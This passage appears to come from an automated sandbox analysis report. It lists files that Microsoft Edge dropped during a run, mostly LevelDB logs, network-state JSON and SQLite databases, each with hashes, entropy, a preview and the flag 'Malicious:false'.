                                                                                                                                                                                                                                                                                                      SHA-512:5176D19A62A541B184E03428E547966A8CF1467E1835B82E1725148D92C818C0E797F7769760425540923AE60D19711CE6B9F8772F2578863383AE8CBD97E4B1
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-12:41:36.644 1bb8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/10-12:41:36.645 1bb8 Recovering log #3.2024/12/10-12:41:36.645 1bb8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):414
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.277454389993055
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:70IvLZYeb8rcHEZrELFUt8OF/+OX54ZYeb8rcHEZrEZSJ:73lYeb8nZrExg8OpJoYeb8nZrEZe
                                                                                                                                                                                                                                                                                                      MD5:35E8B1AC03A10E7E5BFEDC2D097A0BD8
                                                                                                                                                                                                                                                                                                      SHA1:9275829C95C22767565BB582BB34676B76323591
                                                                                                                                                                                                                                                                                                      SHA-256:657E3BAA69516CBB0201DC7563B017D4C4641B2197D0514EEA6E80D1C3909582
                                                                                                                                                                                                                                                                                                      SHA-512:5176D19A62A541B184E03428E547966A8CF1467E1835B82E1725148D92C818C0E797F7769760425540923AE60D19711CE6B9F8772F2578863383AE8CBD97E4B1
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-12:41:36.644 1bb8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/10-12:41:36.645 1bb8 Recovering log #3.2024/12/10-12:41:36.645 1bb8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):339
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.157634274615457
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:7kgdGN+q2PcNwi23oH+Tcwt8a2jMGIFUt8OkzoD5Zmw+Ok3VkwOcNwi23oH+Tcw2:7FZvLZYeb8EFUt8OrN/+OY54ZYeb8bJ
                                                                                                                                                                                                                                                                                                      MD5:F0D22214112DCE07AF83D94191B4685C
                                                                                                                                                                                                                                                                                                      SHA1:AC6320D935CB39D34D02B4516BA1FD2F6B095BF1
                                                                                                                                                                                                                                                                                                      SHA-256:22E28CBD25D7887458FA6E6961992F02131739D366BBBB1014DE2AAB4CF23F80
                                                                                                                                                                                                                                                                                                      SHA-512:00722FD0FD0C86D7461D8E72F0BBE495C9C79CB57C81122AA3844ACC359289D2B25325E28E32A834CE61602ADFDE14961D3B2515A474CA03EB2B45D8D13A661D
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-14:07:40.298 7f8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/10-14:07:40.301 7f8 Recovering log #3.2024/12/10-14:07:40.304 7f8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):339
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.157634274615457
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:7kgdGN+q2PcNwi23oH+Tcwt8a2jMGIFUt8OkzoD5Zmw+Ok3VkwOcNwi23oH+Tcw2:7FZvLZYeb8EFUt8OrN/+OY54ZYeb8bJ
                                                                                                                                                                                                                                                                                                      MD5:F0D22214112DCE07AF83D94191B4685C
                                                                                                                                                                                                                                                                                                      SHA1:AC6320D935CB39D34D02B4516BA1FD2F6B095BF1
                                                                                                                                                                                                                                                                                                      SHA-256:22E28CBD25D7887458FA6E6961992F02131739D366BBBB1014DE2AAB4CF23F80
                                                                                                                                                                                                                                                                                                      SHA-512:00722FD0FD0C86D7461D8E72F0BBE495C9C79CB57C81122AA3844ACC359289D2B25325E28E32A834CE61602ADFDE14961D3B2515A474CA03EB2B45D8D13A661D
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-14:07:40.298 7f8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/10-14:07:40.301 7f8 Recovering log #3.2024/12/10-14:07:40.304 7f8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\3b806730-f701-49b5-8ee0-e2600eb7a797.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\41727109-d15f-469b-9ad7-1e25f4bff9ba.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\42d7bbe4-5320-408d-9a82-56203671e548.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1829
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.307290734326565
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:YcCpfC0gCzs/tsHNfcKsbCiRspmleeBkhYhbyDF:F2fhcq8V3keBkOhy
                                                                                                                                                                                                                                                                                                      MD5:621DBED2A6F4E79E18C165CC6AFCD7FC
                                                                                                                                                                                                                                                                                                      SHA1:3A0FF3454CA991078E51A09D579BF5AAC59FF31F
                                                                                                                                                                                                                                                                                                      SHA-256:F0ACEC34FBC89A2C42897B99BE1628A09F09860AFFA711131B11D2AD96A9C456
                                                                                                                                                                                                                                                                                                      SHA-512:55610338F3AE5B13C3657A8C06067FCBA476983C7DFB5675E7E14685BE4CCF3DFF468CF3DF45632BAA46D2490381015A986D24C4D753BECFFAF23DF235F3207D
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380918095408396","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380918099279910","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"1

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.1295572886785545
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:TsKLopF+SawLUO1Xj8BW1V2WPg1AhqXhAJpiVSsN5VGL:te+Au2oug6KAJIs
                                                                                                                                                                                                                                                                                                      MD5:B82648882519C98B707EF11CCE88AEEC
                                                                                                                                                                                                                                                                                                      SHA1:B5FDC54BF044FEE4C39F4BF0AC514096CAA8E236
                                                                                                                                                                                                                                                                                                      SHA-256:33C00BB0B645592C02F3A33372FB01B79C52C06D869204D7E43E9F6A6135D191
                                                                                                                                                                                                                                                                                                      SHA-512:8237F44A5695DADAEF76174B26B65D4487FB69D8EA6E4D22569DC9AEBD35146E27589E4440509A47443000F34F9CCDBDADFBC2D54FCBE39ACE73C4F997BD63A6
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1829
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.307290734326565
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:YcCpfC0gCzs/tsHNfcKsbCiRspmleeBkhYhbyDF:F2fhcq8V3keBkOhy
                                                                                                                                                                                                                                                                                                      MD5:621DBED2A6F4E79E18C165CC6AFCD7FC
                                                                                                                                                                                                                                                                                                      SHA1:3A0FF3454CA991078E51A09D579BF5AAC59FF31F
                                                                                                                                                                                                                                                                                                      SHA-256:F0ACEC34FBC89A2C42897B99BE1628A09F09860AFFA711131B11D2AD96A9C456
                                                                                                                                                                                                                                                                                                      SHA-512:55610338F3AE5B13C3657A8C06067FCBA476983C7DFB5675E7E14685BE4CCF3DFF468CF3DF45632BAA46D2490381015A986D24C4D753BECFFAF23DF235F3207D
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380918095408396","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380918099279910","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"1

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):36864
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.1117491057374858
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB8a:JkIEumQv8m1ccnvS6hWD1cI9WW1a
                                                                                                                                                                                                                                                                                                      MD5:D1A0DA59265F7B294F0C123916CE7B09
                                                                                                                                                                                                                                                                                                      SHA1:48A5302131003F577BDE3A15903BE7B889FD62B1
                                                                                                                                                                                                                                                                                                      SHA-256:29AC63DAB5F173A50F6437E6EAE3A71584041CA0FC836185A93C92C06C7BF15B
                                                                                                                                                                                                                                                                                                      SHA-512:D7FF961EFC8DD5D0E142AAFA84C5B3A46C02FDE9645E38724526D7D00AE3C9091D83B3D4D7B4E00D0DFFD1B9947D21B839C401FF0FB1044B4C978F4E3DBEA75E
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF251b0.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF26bfe.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\d101629b-0881-4392-9dd3-81abd1488790.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\fce52a90-5b21-4254-86aa-0af9f7cb417f.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6949007314891732
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:TLSnAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3isal/d0dtdjiG1dMgrfNr:TLSOUOq0afDdWec9sJrl7ZWI7J5fc
                                                                                                                                                                                                                                                                                                      MD5:52DE909D04514C10D7428B67A26BBDAC
                                                                                                                                                                                                                                                                                                      SHA1:0371737559133042EBF793502ECDC403011376E4
                                                                                                                                                                                                                                                                                                      SHA-256:B05BF68A882F04103FA0F53A61974AFB591B09010DDBD5139B67B9ECE073F388
                                                                                                                                                                                                                                                                                                      SHA-512:A1A861BBE3D275229BD39E11A72D894D9838145876FB40D1E233D1637F26BD5C13FBCF329D7984E0F89C3D69D1177E0E852C47B2404AC4A161101EA6ED0C7DE0
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Pdf\pdfSQLite

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):6144
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.7743645077705553
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:LBtiuWkKcwF11DM/FAf4ADXLpO7L0rqqp2LE:LLiuW9LFPY/Wf4ADlo0rqqp7
                                                                                                                                                                                                                                                                                                      MD5:67F9F169B9733D0B26C53D49D3D6901E
                                                                                                                                                                                                                                                                                                      SHA1:7958765AC28BAF9F13159E0C44DDBA87BD690F05
                                                                                                                                                                                                                                                                                                      SHA-256:EEAB40199ACEDBF9EC311D648F26E113AEF621F9C05411A87C68BF48E8A2EF34
                                                                                                                                                                                                                                                                                                      SHA-512:43970ED2CC511CDC36B089AEA3D9E2B0B328F2B39598B160DB37F80E52AA51A52B05F42FD598EBFAD27141E3DC6465864B9960198F9A6BA77B884F4A9DBBBCA7
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):9080
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.093944443384687
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:st+SGSs+PGyaNPmk8Z3388bV+FiA9WT1P5YJ:st+AseGtJKFbGiOv
                                                                                                                                                                                                                                                                                                      MD5:06751022EF83EEC93154A4A8276D5ADE
                                                                                                                                                                                                                                                                                                      SHA1:D5ACF9666E9A7B418F685FD393F5AE393E022352
